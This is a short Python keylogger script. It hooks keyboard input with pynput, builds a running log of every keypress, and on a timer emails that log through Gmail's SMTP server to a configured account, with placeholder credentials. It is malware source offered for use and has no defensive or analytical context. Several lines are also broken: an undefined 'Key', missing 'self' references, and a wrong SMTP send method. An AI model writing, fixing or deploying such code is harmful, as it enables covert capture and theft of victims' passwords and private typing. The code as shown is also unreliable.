#!/usr/bin/python3.8

import pynput.keyboard as keyboard
import threading, smtplib

class Keylogger:
	
	def __init__(self,time_interval,email,password):
		self.log = ''
		self.interval = time_interval	#time interval after which report is to be sent
		self.email = email				#email id to use here
		self.password = password		#password here

	def append_to_log(self,string):
		self.log += string

	def process_keypress(self,key):
		try:
			to_append = str(key.char)
		except AttributeError:
			if key == Key.space:
				to_append = ' '
			else:
				to_append = '#' + str(key) + '#'
		append_to_log(self.to_append)

	def report(self):
		self.send_mail(self.email,self.password,self.log)
		self.log = ''
		timer = threading.Timer(self.interval,self.report)
		timer.start()

	def send_mail(self,email,password,message):
		server = smtplib.SMTP('smtp.gmail.com',587)
		server.starttls()
		server.login(email,password)
		server.send(email,email,message)
		server.quit()

	def start(self):
		with keyboard.Listener(on_press=self.process_keypress) as listener:
			self.report()
			listener.join()

mykeylogger = Keylogger(60,'#your-email-here#','#your-password-here#')
mykeylogger.start()